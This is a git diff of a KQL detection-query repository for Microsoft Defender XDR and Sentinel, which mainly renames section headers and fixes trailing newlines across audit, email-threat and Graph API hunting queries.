XDR/CustomDetectionDeletion.md @@ -18,7 +18,7 @@ An actor has gotten access to an account that is able to delete custom detection - https://learn.microsoft.com/en-us/defender-xdr/custom-detections-overview - https://kqlquery.com/posts/audit-defender-xdr/ -## Defender For Endpoint +## Defender XDR ``` CloudAppEvents | where Timestamp > ago(30d) @@ -33,4 +33,4 @@ CloudAppEvents | where ActionType == "DeleteCustomDetection" | extend RuleName = tostring(parse_json(RawEventData).RuleName), Query = tostring(parse_json(RawEventData).Query), AlertDescription = parse_json(RawEventData).AlertDescription | project-reorder AccountDisplayName, AccountId, RuleName, AlertDescription, Query -``` \ No newline at end of file +``` diff --git a/Defender XDR/CustomDetectionReport.md b/Defender XDR/CustomDetectionReport.md index 56cc651..2f44508 100644 --- a/Defender XDR/CustomDetectionReport.md +++ b/Defender XDR/CustomDetectionReport.md 
@@ -32,7 +32,7 @@ While the query ignores all simple modifications (EditCustomDetection), it will - https://learn.microsoft.com/en-us/defender-xdr/custom-detections-overview - https://kqlquery.com/posts/audit-defender-xdr/ -## Defender For Endpoint +## Defender XDR ```KQL search in(CloudAppEvents) 'Microsoft365Defender' | where Timestamp > ago(180d) // How far back to check diff --git a/Defender XDR/DeviceIsolation.md b/Defender XDR/DeviceIsolation.md index 85ac0bf..1b38402 100644 --- a/Defender XDR/DeviceIsolation.md +++ b/Defender XDR/DeviceIsolation.md @@ -9,7 +9,7 @@ This query lists all the device isolation activities that have been performed by - https://learn.microsoft.com/en-us/defender-endpoint/respond-machine-alerts - https://kqlquery.com/posts/audit-defender-xdr/ -## Defender For Endpoint +## Defender XDR ``` CloudAppEvents | where Timestamp > ago(30d) @@ -26,4 +26,4 @@ CloudAppEvents | extend IsolatedDevice = tostring(parse_json(RawEventData).DeviceName), IsolationComment = tostring(parse_json(RawEventData).ActionComment), IsolationScope = tostring(parse_json(RawEventData).ActionScope) | project-rename InitiatedByAccountName = AccountDisplayName, InitiatedByAccounttId = AccountId |project-reorder TimeGenerated, IsolatedDevice, IsolationComment, IsolationScope, InitiatedByAccountName, InitiatedByAccounttId -``` \ No newline at end of file +``` diff --git a/Defender XDR/DeviceRemovedFromIsolation.md b/Defender XDR/DeviceRemovedFromIsolation.md index 76eb885..16def5a 100644 --- a/Defender XDR/DeviceRemovedFromIsolation.md +++ b/Defender XDR/DeviceRemovedFromIsolation.md @@ -9,7 +9,7 @@ This query lists all the devices that are removed from isolation activities that - https://learn.microsoft.com/en-us/defender-endpoint/respond-machine-alerts - https://kqlquery.com/posts/audit-defender-xdr/ -## Defender For Endpoint +## Defender XDR ``` CloudAppEvents | where Timestamp > ago(30d) 
@@ -40,4 +40,4 @@ CloudAppEvents | project-rename IsolationInitiatedByAccountName = AccountDisplayName, IsoaltionInitiatedByAccounttId = AccountId, IsolationTime = TimeGenerated | project IsolationTime, IsolatedDevice, IsolationComment, IsolationScope, IsolationInitiatedByAccountName, IsoaltionInitiatedByAccounttId) on $left.ReleasedDevice == $right.IsolatedDevice |project-reorder TimeGenerated, ReleasedDevice, ReleaseComment, InitiatedByAccountName, InitiatedByAccounttId, IsolationTime, IsolationComment, IsolationScope, IsolationInitiatedByAccountName, IsoaltionInitiatedByAccounttId -``` \ No newline at end of file +``` diff --git a/Defender XDR/LiveResponseFileCollection.md b/Defender XDR/LiveResponseFileCollection.md index 0b3845b..113b44a 100644 --- a/Defender XDR/LiveResponseFileCollection.md +++ b/Defender XDR/LiveResponseFileCollection.md @@ -11,7 +11,7 @@ This query lists all the Getfile activities that have been executed. This includ - https://learn.microsoft.com/en-us/defender-xdr/advanced-hunting-fileprofile-function - https://kqlquery.com/posts/audit-defender-xdr/ -## Defender For Endpoint +## Defender XDR ``` CloudAppEvents | where Timestamp > ago(30d) @@ -30,4 +30,4 @@ CloudAppEvents | project-rename InitiatedByAccountName = AccountDisplayName, InitiatedByAccounttId = AccountId, SHA256 = FileSHA256 | invoke FileProfile(SHA256, 1000) | project-reorder TimeGenerated, FileName, SHA256, InitiatedByAccountName, InitiatedByAccounttId, GlobalPrevalence, SignatureState -``` \ No newline at end of file +``` diff --git a/Defender XDR/LiveResponseUnsignedPowerShellChanges.md b/Defender XDR/LiveResponseUnsignedPowerShellChanges.md index 0e02a25..bcf4da2 100644 --- a/Defender XDR/LiveResponseUnsignedPowerShellChanges.md +++ b/Defender XDR/LiveResponseUnsignedPowerShellChanges.md 
@@ -11,7 +11,7 @@ This query lists all changes to the Live Response Unsigned Script settings in th - https://kqlquery.com/posts/audit-defender-xdr/ -## Defender For Endpoint +## Defender XDR ``` CloudAppEvents | where ActionType == "SetAdvancedFeatures" @@ -26,4 +26,4 @@ CloudAppEvents | extend SettingName = tostring(parse_json(RawEventData).SettingName), SettingsNewValue = tostring(parse_json(RawEventData).SettingsNewValue) | where SettingName == "Live Response unsigned script execution" | project-reorder TimeGenerated, AccountId, ActionType, SettingName, SettingsNewValue -``` \ No newline at end of file +``` diff --git a/Defender XDR/ManualAntivirusScans.md b/Defender XDR/ManualAntivirusScans.md index 5723276..f4c30e8 100644 --- a/Defender XDR/ManualAntivirusScans.md +++ b/Defender XDR/ManualAntivirusScans.md @@ -9,7 +9,7 @@ This query lists all manual (and playbook related) anvitius actions that are ini - https://learn.microsoft.com/en-us/defender-endpoint/mdav-scan-best-practices - https://kqlquery.com/posts/audit-defender-xdr/ -## Defender For Endpoint +## Defender XDR ``` CloudAppEvents | where ActionType == "RunAntiVirusScan" @@ -22,4 +22,4 @@ CloudAppEvents | where ActionType == "RunAntiVirusScan" | extend DeviceName = tostring(parse_json(RawEventData).DeviceName), ActionComment = tostring(parse_json(RawEventData).ActionComment), ActionScope = tostring(parse_json(RawEventData).ActionScope) | summarize TotalAntivirusScans = count(), ScanTypes = make_set(ActionScope), Comments = make_set(ActionComment) by DeviceName -``` \ No newline at end of file +``` diff --git a/Defender XDR/OffboardingPackageDownloaded.md b/Defender XDR/OffboardingPackageDownloaded.md index 64eb061..e9d8031 100644 --- a/Defender XDR/OffboardingPackageDownloaded.md +++ b/Defender XDR/OffboardingPackageDownloaded.md 
@@ -18,7 +18,7 @@ An actor has gotten access to an account that is able to download an Defender Fo - https://learn.microsoft.com/en-us/defender-endpoint/offboard-machines - https://kqlquery.com/posts/audit-defender-xdr/ -## Defender For Endpoint +## Defender XDR ``` CloudAppEvents | where ActionType == "DownloadOffboardingPkg" @@ -33,4 +33,4 @@ CloudAppEvents | extend UserId = tostring(parse_json(RawEventData).UserId), ClientIP = tostring(parse_json(RawEventData).ClientIP) | project-rename InitiatedByAccountName = AccountDisplayName, InitiatedByAccounttId = AccountId | project-reorder TimeGenerated, InitiatedByAccountName, UserId, ClientIP, ActionType -``` \ No newline at end of file +``` diff --git a/Defender XDR/RBACChanges.md b/Defender XDR/RBACChanges.md index 473d1df..b346f0c 100644 --- a/Defender XDR/RBACChanges.md +++ b/Defender XDR/RBACChanges.md @@ -10,7 +10,7 @@ The query below can be used to monitor RBAC changes in Defender XDR. This query - https://learn.microsoft.com/en-us/defender-endpoint/rbac - https://kqlquery.com/posts/audit-defender-xdr/ -## Defender For Endpoint +## Defender XDR ``` CloudAppEvents | extend Workload = tostring(parse_json(RawEventData).Workload) @@ -27,4 +27,4 @@ CloudAppEvents | where ActionType endswith "Role" | extend RoleName = tostring(parse_json(RawEventData).RoleName), RolePermissions = tostring(parse_json(RawEventData).RolePermissions), AssignedGroups = tostring(parse_json(RawEventData).AssignedGroups) | project-reorder TimeGenerated, ActionType, AccountObjectId, RoleName, RolePermissions, AssignedGroups -``` \ No newline at end of file +``` diff --git a/DetectionTemplate.md b/DetectionTemplate.md index 13e3d72..b306b10 100644 --- a/DetectionTemplate.md +++ b/DetectionTemplate.md @@ -39,4 +39,4 @@ DeviceProcessEvents // Paste your query here DeviceProcessEvents | where FileName == "Example.File" -``` \ No newline at end of file +``` 
diff --git a/Exposure Management/MostPermissiveEntities.md b/Exposure Management/MostPermissiveEntities.md index 8947155..8bcb47d 100644 --- a/Exposure Management/MostPermissiveEntities.md +++ b/Exposure Management/MostPermissiveEntities.md @@ -8,7 +8,7 @@ This query lists the top 100 entities that have the most permissions to perform #### References - https://learn.microsoft.com/en-us/security-exposure-management/microsoft-security-exposure-management -## Defender For Endpoint +## Defender XDR ```KQL // Permission Statistics ExposureGraphEdges @@ -19,4 +19,4 @@ ExposureGraphEdges | sort by TotalPermissions, SourceNodeName | project SourceNodeName, TotalPermissions, PermissionTypeCount, ResourceList, PermissionTypes | top 100 by TotalPermissions -``` \ No newline at end of file +``` diff --git a/Fun/KQLQueryVisits.md b/Fun/KQLQueryVisits.md index 54df1b9..33e2de3 100644 --- a/Fun/KQLQueryVisits.md +++ b/Fun/KQLQueryVisits.md @@ -8,7 +8,7 @@ Visualize the visits to [KQLQuery.com](KQLQuery.com) in a columnchart. #### References - https://www.KQLQuery.com/ -## Defender For Endpoint +## Defender XDR ```KQL DeviceNetworkEvents | where RemoteUrl has "kqlquery.com" @@ -21,4 +21,4 @@ DeviceNetworkEvents | where RemoteUrl has "kqlquery.com" | summarize TotalDevices = dcount(DeviceId) by bin(TimeGenerated, 1d) | render columnchart with(title="kqlquery.com visits", xtitle="Date", ytitle="TotalDevices") -``` \ No newline at end of file +``` diff --git a/Fun/KQLSearchVisits.md b/Fun/KQLSearchVisits.md index dd73d2a..286dfe3 100644 --- a/Fun/KQLSearchVisits.md +++ b/Fun/KQLSearchVisits.md @@ -8,7 +8,7 @@ Visualize the visits to [kqlsearch.com](kqlsearch.com) in a columnchart. #### References - https://www.kqlsearch.com/ -## Defender For Endpoint +## Defender XDR ```KQL DeviceNetworkEvents | where RemoteUrl has "kqlsearch.com" 
@@ -21,4 +21,4 @@ DeviceNetworkEvents | where RemoteUrl has "kqlsearch.com" | summarize TotalDevices = dcount(DeviceId) by bin(TimeGenerated, 1d) | render columnchart with(title="KQLSearch.com visits", xtitle="Date", ytitle="TotalDevices") -``` \ No newline at end of file +``` diff --git a/Fun/MailItemsAccessed.md b/Fun/MailItemsAccessed.md index 856a7d8..d716ccc 100644 --- a/Fun/MailItemsAccessed.md +++ b/Fun/MailItemsAccessed.md @@ -9,4 +9,4 @@ union OfficeActivity, CloudAppEvents | where Operation == "MailItemsAccessed" | summarize TotalEvents = count(), TotalCloudAppsEvents = countif(Type == "CloudAppEvents"), TotalUALEvents = countif(Type == "OfficeActivity") by bin(TimeGenerated, 1d) | extend EqualLogs = iff(TotalCloudAppsEvents == TotalUALEvents, true, false) -``` \ No newline at end of file +``` diff --git a/Fun/TeamsEmojiReactions.md b/Fun/TeamsEmojiReactions.md index e3034db..1ec19c6 100644 --- a/Fun/TeamsEmojiReactions.md +++ b/Fun/TeamsEmojiReactions.md @@ -5,7 +5,7 @@ #### Description This query lists the statistics of the Emoji reactions that have been send via Microsoft Teams -## Defender For Endpoint +## Defender XDR ```KQL CloudAppEvents | where Application == "Microsoft Teams" @@ -24,4 +24,4 @@ CloudAppEvents | where isnotempty(Emoji) | summarize TotalUsage = count() by Emoji | sort by TotalUsage -``` \ No newline at end of file +``` diff --git a/Fun/TeamsEmojiReactionsByDepartment.md b/Fun/TeamsEmojiReactionsByDepartment.md index 59a25fa..3edfdca 100644 --- a/Fun/TeamsEmojiReactionsByDepartment.md +++ b/Fun/TeamsEmojiReactionsByDepartment.md @@ -5,7 +5,7 @@ #### Description This query lists the statistics of the Emoji reactions that have been send via Microsoft Teams for each Department. -## Defender For Endpoint +## Defender XDR ```KQL CloudAppEvents | where Application == "Microsoft Teams" 
@@ -36,4 +36,4 @@ CloudAppEvents on $left.AccountObjectId == $right.AccountObjectId | project Department, Emoji | evaluate pivot(Department) // If you want to have the Departments on the y axis use | evaluate pivot(Emoji) -``` \ No newline at end of file +``` diff --git a/Functions/CollectIncidentStatistics.md b/Functions/CollectIncidentStatistics.md index 75adac7..8637dc4 100644 --- a/Functions/CollectIncidentStatistics.md +++ b/Functions/CollectIncidentStatistics.md @@ -5,7 +5,7 @@ #### Description This function returns the severity statistics of Sentinel or XDR. -## Defender For Endpoint +## Defender XDR ``` let CollectIncidentStatistics = (TimeSpan: timespan) { AlertInfo diff --git a/Functions/DeviceCommandLinePublicIPs.md b/Functions/DeviceCommandLinePublicIPs.md index 21e90c3..a3b846f 100644 --- a/Functions/DeviceCommandLinePublicIPs.md +++ b/Functions/DeviceCommandLinePublicIPs.md @@ -10,7 +10,7 @@ This function returns all public IPv4 addresses that have been seen on the comma - https://lolbas-project.github.io/lolbas/Binaries/Rundll32/ - https://andreafortuna.org/2017/11/27/how-a-malware-can-download-a-remote-payload-and-execute-malicious-code-in-one-line/ -## Defender For Endpoint +## Defender XDR ``` let IPRegex = '[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}'; // Returns all commandlines that contain a public IP addres from a specific device @@ -41,4 +41,4 @@ DeviceProcessEvents }; // Example DeviceCommandLinePublicIPs("devicename.tld", false) -``` \ No newline at end of file +``` diff --git a/Functions/IsDomainController.md b/Functions/IsDomainController.md index a54c1e0..2b2da04 100644 --- a/Functions/IsDomainController.md +++ b/Functions/IsDomainController.md 
@@ -9,7 +9,7 @@ This function validates if a device is a Domain Controller. It will return true - https://learn.microsoft.com/en-us/azure/data-explorer/kusto/query/functions/user-defined-functions - https://learn.microsoft.com/en-us/microsoft-365/security/defender/advanced-hunting-custom-functions?view=o365-worldwide -## Defender For Endpoint +## Defender XDR ``` // This function validates if a device is a Domain Controller. It will return true when it is a domain controller, alternatively false is returned. let IsDeviceDomainController = (DeviceNameInput: string) { diff --git a/Functions/LastPowerShellExecutions.md b/Functions/LastPowerShellExecutions.md index d48267b..4f792da 100644 --- a/Functions/LastPowerShellExecutions.md +++ b/Functions/LastPowerShellExecutions.md @@ -10,7 +10,7 @@ This function returns the last x amount of powershell executions that have been - https://learn.microsoft.com/en-us/microsoft-365/security/defender/advanced-hunting-custom-functions?view=o365-worldwide - https://learn.microsoft.com/en-us/azure/data-explorer/kusto/query/scalar-data-types/timespan -## Defender For Endpoint +## Defender XDR ``` // Returns the last x amount of powershell executions based on a device and the timespan. Timespan examples can be seen in https://learn.microsoft.com/en-us/azure/data-explorer/kusto/query/scalar-data-types/timespan let LastPowerShellExecutions = (DeviceNameInput: string, Results: int, TimeFrame: timespan) { diff --git a/Functions/ListAllActionsAndOperations.md b/Functions/ListAllActionsAndOperations.md index c10c604..9beadd0 100644 --- a/Functions/ListAllActionsAndOperations.md +++ b/Functions/ListAllActionsAndOperations.md @@ -35,4 +35,4 @@ union * }; // Example ListAllActionsAndOperations -``` \ No newline at end of file +``` diff --git a/Functions/ListCISAExploitedVulnerabilites.md b/Functions/ListCISAExploitedVulnerabilites.md index 20008a5..a16c68e 100644 --- a/Functions/ListCISAExploitedVulnerabilites.md 
+++ b/Functions/ListCISAExploitedVulnerabilites.md @@ -9,7 +9,7 @@ This function lists all Known Exploited Vulnerabilities as classified by CISA. T - https://www.cisa.gov/known-exploited-vulnerabilities-catalog - https://www.cisa.gov/sites/default/files/csv/known_exploited_vulnerabilities.csv -## Defender For Endpoint +## Defender XDR ``` let ListCISAExploitedVulnerabilites = (StartYear:long) { let KnowExploitesVulnsCISA = externaldata(cveID: string, vendorProject: string, product: string, vulnerabilityName: string, dateAdded: datetime, shortDescription: string, requiredAction: string, dueDate: datetime, notes: string)[@"https://www.cisa.gov/sites/default/files/csv/known_exploited_vulnerabilities.csv"] with (format="csv", ignoreFirstRecord=True); @@ -32,4 +32,4 @@ let ListCISAExploitedVulnerabilites = (StartYear:long) { }; // Example only list from 2023 or newer ListCISAExploitedVulnerabilites(2023); -``` \ No newline at end of file +``` diff --git a/Functions/ListDomainControllers.md b/Functions/ListDomainControllers.md index 8c5eabd..d9e7ff9 100644 --- a/Functions/ListDomainControllers.md +++ b/Functions/ListDomainControllers.md @@ -9,7 +9,7 @@ This function list all the domain controllers in your environment. Which might b - https://learn.microsoft.com/en-us/azure/data-explorer/kusto/query/functions/user-defined-functions - https://learn.microsoft.com/en-us/microsoft-365/security/defender/advanced-hunting-custom-functions?view=o365-worldwide -## Defender For Endpoint +## Defender XDR ``` // This function list all domain controllers that have been active in the last 7 days. let ListDomainControllers = diff --git a/Functions/UserRiskStatus.md b/Functions/UserRiskStatus.md index eeb3c7a..615d8b4 100644 --- a/Functions/UserRiskStatus.md +++ b/Functions/UserRiskStatus.md 
@@ -10,7 +10,7 @@ This function returns the RiskState of a UPN, if the results are empty then the - https://learn.microsoft.com/en-us/microsoft-365/security/defender/advanced-hunting-custom-functions?view=o365-worldwide - https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/howto-export-risk-data -## Defender For Endpoint +## Defender XDR ``` // Function returns the RiskState of a UPN, if the results are empty then the user did not have a risky state in the last 90 days. let UserRiskStatus = (UPN: string) { diff --git a/Graph API/AppEnrichmentAADNonInteractiveUserSignInLogs.md b/Graph API/AppEnrichmentAADNonInteractiveUserSignInLogs.md index e61fb8a..159ff33 100644 --- a/Graph API/AppEnrichmentAADNonInteractiveUserSignInLogs.md +++ b/Graph API/AppEnrichmentAADNonInteractiveUserSignInLogs.md @@ -22,4 +22,4 @@ MicrosoftGraphActivityLogs // Your filter here | lookup kind=leftouter ApplicationName on $left.AppId == $right.ResourceIdentity | project-reorder AppId, ApplicationName -``` \ No newline at end of file +``` diff --git a/Graph API/AppEnrichmentExternalData.md b/Graph API/AppEnrichmentExternalData.md index 68f922d..73cfa8a 100644 --- a/Graph API/AppEnrichmentExternalData.md +++ b/Graph API/AppEnrichmentExternalData.md @@ -18,4 +18,4 @@ MicrosoftGraphActivityLogs | take 1000 | lookup kind=leftouter ApplicationInformation on $left.AppId == $right.AppId | project-reorder AppId, ApplicationName -``` \ No newline at end of file +``` diff --git a/Graph API/AzureHound.md b/Graph API/AzureHound.md index b266e55..c9e2f6e 100644 --- a/Graph API/AzureHound.md +++ b/Graph API/AzureHound.md 
@@ -39,4 +39,4 @@ MicrosoftGraphActivityLogs | where not(ObjectId in (WhitelistedObjects)) | summarize TotalResponseSize = sum(ResponseSizeBytes), UniqueRequests = dcount(RequestId), Requests = make_set(RequestUri, 1000), Paths = make_set(GraphAPIPath), Resources = make_set(GraphAPIResource), UniqueResourceCount = dcount(GraphAPIResource) by UserId, bin(TimeGenerated, 1h), UserAgent, ObjectId | where UniqueRequests >= UniqueRequestThreshold and TotalResponseSize >= TotalResponseSizeTHreshold and UniqueResourceCount >= ResourceThreshold -``` \ No newline at end of file +``` diff --git a/Graph API/GraphResourceAPIRequestStats.md b/Graph API/GraphResourceAPIRequestStats.md index 347c73c..cfc5fcb 100644 --- a/Graph API/GraphResourceAPIRequestStats.md +++ b/Graph API/GraphResourceAPIRequestStats.md @@ -35,4 +35,4 @@ MicrosoftGraphActivityLogs | extend GraphAPIResource = tostring(split(GraphAPIPath, "/")[2]) | summarize TotalRequest = count() by GraphAPIResource | sort by TotalRequest -``` \ No newline at end of file +``` diff --git a/Graph API/GraphURIAPIRequestStats.md b/Graph API/GraphURIAPIRequestStats.md index eda642e..d9762ed 100644 --- a/Graph API/GraphURIAPIRequestStats.md +++ b/Graph API/GraphURIAPIRequestStats.md @@ -14,4 +14,4 @@ MicrosoftGraphActivityLogs | extend ParsedUri = tostring(parse_url(RequestUri).Path) | summarize TotalRequest = count() by ParsedUri | sort by TotalRequest -``` \ No newline at end of file +``` diff --git a/Graph API/IPEnrichment.md b/Graph API/IPEnrichment.md index e692c5a..9112150 100644 --- a/Graph API/IPEnrichment.md +++ b/Graph API/IPEnrichment.md 
@@ -14,4 +14,4 @@ MicrosoftGraphActivityLogs | extend GeoIPInfo = geo_info_from_ip_address(IPAddress) | extend country = tostring(parse_json(GeoIPInfo).country), state = tostring(parse_json(GeoIPInfo).state), city = tostring(parse_json(GeoIPInfo).city), latitude = tostring(parse_json(GeoIPInfo).latitude), longitude = tostring(parse_json(GeoIPInfo).longitude) | project-reorder IPAddress, country, state, RequestUri -``` \ No newline at end of file +``` diff --git a/Graph API/UserEnrichment.md b/Graph API/UserEnrichment.md index c7623c7..5b885e3 100644 --- a/Graph API/UserEnrichment.md +++ b/Graph API/UserEnrichment.md @@ -20,4 +20,4 @@ MicrosoftGraphActivityLogs | project AccountObjectId, AccountDisplayName, AccountUPN) on $left.UserId == $right.AccountObjectId | project-reorder AccountDisplayName, AccountUPN, RequestMethod, RequestUri -``` \ No newline at end of file +``` diff --git a/KQL Regex/RegexExamples.md b/KQL Regex/RegexExamples.md index 21871d4..0a62100 100644 --- a/KQL Regex/RegexExamples.md +++ b/KQL Regex/RegexExamples.md @@ -103,4 +103,4 @@ Example query: [List Role Additions (Line 6)](../Azure%20Active%20Directory/ADRo ``` let MD5Regex = '[a-f0-9]{32}'; ``` -Example query: [AbuseCH MD5 Malware Hash](https://github.com/Bert-JanP/Hunting-Queries-Detection-Rules/blob/main/Threat%20Hunting/AbuseCHMD5Malware.md) \ No newline at end of file +Example query: [AbuseCH MD5 Malware Hash](https://github.com/Bert-JanP/Hunting-Queries-Detection-Rules/blob/main/Threat%20Hunting/AbuseCHMD5Malware.md) diff --git a/Log Analytics/LogAnalyticsQueryStatistics.md b/Log Analytics/LogAnalyticsQueryStatistics.md index b7aece8..311a166 100644 --- a/Log Analytics/LogAnalyticsQueryStatistics.md +++ b/Log Analytics/LogAnalyticsQueryStatistics.md 
@@ -14,4 +14,4 @@ To audit the query executions the Azure Diagnostics settings for the Log Analyti LAQueryLogs | summarize UnqiueQueryCount = dcount(QueryText), TotalQueriesExecuted = count() by AADEmail | sort by AADEmail -``` \ No newline at end of file +``` diff --git a/MISP/MISP Feed Implementation Status/README.md b/MISP/MISP Feed Implementation Status/README.md index 29694e7..2a1c491 100644 --- a/MISP/MISP Feed Implementation Status/README.md +++ b/MISP/MISP Feed Implementation Status/README.md @@ -77,4 +77,4 @@ Some feeds that are mentioned on [MISPs Feed page](https://www.misp-project.org/ | [This list contains all optional domains - An additional list for administrators](https://gitlab.com/ZeroDot1/CoinBlockerLists/raw/master/list_optional.txt?inline=false) | ZeroDot1 - CoinBlockerLists | Read from IStreamSource failed | | [Tor exit nodes](https://www.dan.me.uk/torlist/?exit) | dan.me.uk | Data is shared in the ALL Nodes feed, otherwise double data is used | | [VXvault - URL List](http://vxvault.net/URL_List.php) | VXvault | Externaldata(), does not support this datatype.| -| [OpenPhish url list](https://openphish.com/feed.txt) | openphish.com | Partial query failure: Unable to perform requested operation. (message: 'Error with persistent storage path 'https://openphish.com/feed.txt' (operation 'CreateFileRef'). | \ No newline at end of file +| [OpenPhish url list](https://openphish.com/feed.txt) | openphish.com | Partial query failure: Unable to perform requested operation. (message: 'Error with persistent storage path 'https://openphish.com/feed.txt' (operation 'CreateFileRef'). | diff --git a/MISP/README.md b/MISP/README.md index cdd09dd..b589b6a 100644 --- a/MISP/README.md +++ b/MISP/README.md @@ -39,7 +39,7 @@ Sentinel and Defender For Endpoint can use different tables. In Defender For End - DeviceNetworkEvents - DeviceFileEvents -## Defender For Endpoint +## Defender XDR - DeviceNetworkEvents - DeviceFileEvents 
@@ -54,4 +54,4 @@ There are other MISP implementations available for Sentinel, however, in those c - https://techcommunity.microsoft.com/t5/microsoft-sentinel-blog/integrating-open-source-threat-feeds-with-misp-and-sentinel/ba-p/1350371 - https://www.inspark.nl/misp-threat-intelligence-azure-sentinel/ - https://www.linkedin.com/pulse/how-ingest-misp-iocs-azure-sentinel-using-security-arshad/ -- https://github.com/zolderio/misp-to-sentinel \ No newline at end of file +- https://github.com/zolderio/misp-to-sentinel diff --git a/Office 365/AnomalousAmountofURLClickEvents.md b/Office 365/AnomalousAmountofURLClickEvents.md index 2a7046a..7a248cf 100644 --- a/Office 365/AnomalousAmountofURLClickEvents.md +++ b/Office 365/AnomalousAmountofURLClickEvents.md @@ -29,7 +29,7 @@ A user has clicked and opened a malicious link. - **Github: https://github.com/guys1444** - **LinkedIn: https://www.linkedin.com/in/guy-sukerman-2002451aa/** -### Defender For Endpoint +### Defender XDR ``` let startDate = ago(30d); let endDate = now(); diff --git a/Office 365/Email - ASRExecutableContentTriggered.md b/Office 365/Email - ASRExecutableContentTriggered.md index b1c000c..f8097c0 100644 --- a/Office 365/Email - ASRExecutableContentTriggered.md +++ b/Office 365/Email - ASRExecutableContentTriggered.md @@ -23,7 +23,7 @@ If this rule is on block mode the action is blocked, if the rul is on audit mode - https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/attack-surface-reduction-rules-reference?view=o365-worldwide - https://unit42.paloaltonetworks.com/ukraine-targeted-outsteel-saintbot/ -## Defender For Endpoint +## Defender XDR ``` DeviceEvents | where ActionType in ("AsrExecutableEmailContentBlocked", "AsrExecutableEmailContentAudited") 
@@ -50,4 +50,4 @@ DeviceEvents | project SenderFromAddress, Subject, NetworkMessageId) on $left.NetworkMessageId == $right.NetworkMessageId | project-reorder SenderFromAddress, Subject, FileName, FileSize, SHA256 -``` \ No newline at end of file +``` diff --git a/Office 365/Email - ExecutableFileRecieved.md b/Office 365/Email - ExecutableFileRecieved.md index f0aecd6..2f16f0e 100644 --- a/Office 365/Email - ExecutableFileRecieved.md +++ b/Office 365/Email - ExecutableFileRecieved.md @@ -19,7 +19,7 @@ An actor gains initial access via a attachment that is send to a mailbox, which - https://support.microsoft.com/en-us/topic/outlook-blocked-access-to-the-following-potentially-unsafe-attachments-c5c4a480-041e-2466-667f-e98d389ff822 - https://www.bleepingcomputer.com/news/security/the-most-common-malicious-email-attachments-infecting-windows/ -## Defender For Endpoint +## Defender XDR ``` let ExecutableFileExtentions = dynamic(['bat', 'cmd', 'com', 'cpl', 'dll', 'ex', 'exe', 'jse', 'lnk','msc', 'ps1', 'reg', 'vb', 'vbe', 'ws', 'wsf']); EmailEvents diff --git a/Office 365/Email - ISOAttachmentRecieved.md b/Office 365/Email - ISOAttachmentRecieved.md index d73da55..7fce19f 100644 --- a/Office 365/Email - ISOAttachmentRecieved.md +++ b/Office 365/Email - ISOAttachmentRecieved.md @@ -15,7 +15,7 @@ A user opens the ISO file that contains malware and grants the adversery initial - https://www.trendmicro.com/vinfo/it/security/news/cybercrime-and-digital-threats/malicious-spam-campaign-uses-iso-image-files-to-deliver-lokibot-and-nanocore - https://support.microsoft.com/en-us/office/blocked-attachments-in-outlook-434752e1-02d3-4e90-9124-8b81e49a8519 -## Defender For Endpoint +## Defender XDR ``` EmailEvents | where EmailDirection == 'Inbound' @@ -51,4 +51,4 @@ EmailEvents FileType, ThreatNames | where FileName endswith ".iso" -``` \ No newline at end of file +``` 
diff --git a/Office 365/Email - MacroAttachmentOpenedFromRareSender.md b/Office 365/Email - MacroAttachmentOpenedFromRareSender.md index 946bca4..59273f7 100644 --- a/Office 365/Email - MacroAttachmentOpenedFromRareSender.md +++ b/Office 365/Email - MacroAttachmentOpenedFromRareSender.md @@ -28,7 +28,7 @@ A actor uses a macro file to gain initial access in the network. This macro must - https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/ - https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/ -## Defender For Endpoint +## Defender XDR ``` // Adjust the threshold based on your organisation. let RareSenderThreshold = 10; @@ -119,4 +119,4 @@ DeviceFileEvents // Only search for inbound mail | where EmailDirection == 'Inbound' | summarize ['Targeted Mailboxes'] = make_set(RecipientEmailAddress) by SHA256, TotalDevices, tostring(FileLocations), Subject, SenderFromAddress -``` \ No newline at end of file +``` diff --git a/Office 365/Email - MostRareFileExtensionsRecieved.md b/Office 365/Email - MostRareFileExtensionsRecieved.md index bf69528..ad430e4 100644 --- a/Office 365/Email - MostRareFileExtensionsRecieved.md +++ b/Office 365/Email - MostRareFileExtensionsRecieved.md @@ -8,7 +8,7 @@ This query list the 20 rarest file extentions that have been used in email attac #### Risk Rare file extensions may incidacte that an actor is trying trick users in opening malicious files. -## Defender For Endpoint +## Defender XDR ``` EmailEvents // Only display inbound emails @@ -33,4 +33,4 @@ EmailEvents | where isnotempty(FileExtension) | summarize Total = count() by FileExtension | top 20 by Total asc -``` \ No newline at end of file +``` diff --git a/Office 365/Email - PotentialPhishingCampaign.md b/Office 365/Email - PotentialPhishingCampaign.md index d8714fe..217e669 100644 --- a/Office 365/Email - PotentialPhishingCampaign.md +++ b/Office 365/Email - PotentialPhishingCampaign.md 
@@ -19,7 +19,7 @@ A phishing campaign using different email addresses is targetting your organisat #### References - https://learn.microsoft.com/en-us/microsoft-365/security/defender/advanced-hunting-emailevents-table?view=o365-worldwide -## Defender For Endpoint +## Defender XDR ```KQL let RareDomainThreshold = 20; let TotalSenderThreshold = 1; @@ -52,4 +52,4 @@ EmailEvents | summarize Subjects = make_set(Subject), Senders = make_set(SenderFromAddress) by EmailClusterId | extend TotalSenders = array_length(Senders) | where TotalSenders >= TotalSenderThreshold -``` \ No newline at end of file +``` diff --git a/Office 365/Email - SafeLinksTrigger.md b/Office 365/Email - SafeLinksTrigger.md index f117818..0f6bc6d 100644 --- a/Office 365/Email - SafeLinksTrigger.md +++ b/Office 365/Email - SafeLinksTrigger.md @@ -20,7 +20,7 @@ A phishing campaign has started and a user has clicked the url, the URL is block #### References - https://learn.microsoft.com/en-us/microsoft-365/security/office-365-security/safe-links-about?view=o365-worldwide -## Defender For Endpoint +## Defender XDR ``` UrlClickEvents | where ActionType == 'ClickBlocked' @@ -39,4 +39,4 @@ UrlClickEvents // join the email events | join kind=leftouter (EmailEvents | project NetworkMessageId, Subject, SenderFromAddress) on NetworkMessageId | project TimeGenerated, AccountUpn, Product = Workload, Url, ThreatTypes, Subject, SenderFromAddress, UrlChain -``` \ No newline at end of file +``` diff --git a/Office 365/ListSafeLinkEvents.md b/Office 365/ListSafeLinkEvents.md index 5c80b90..2cd8e9d 100644 --- a/Office 365/ListSafeLinkEvents.md +++ 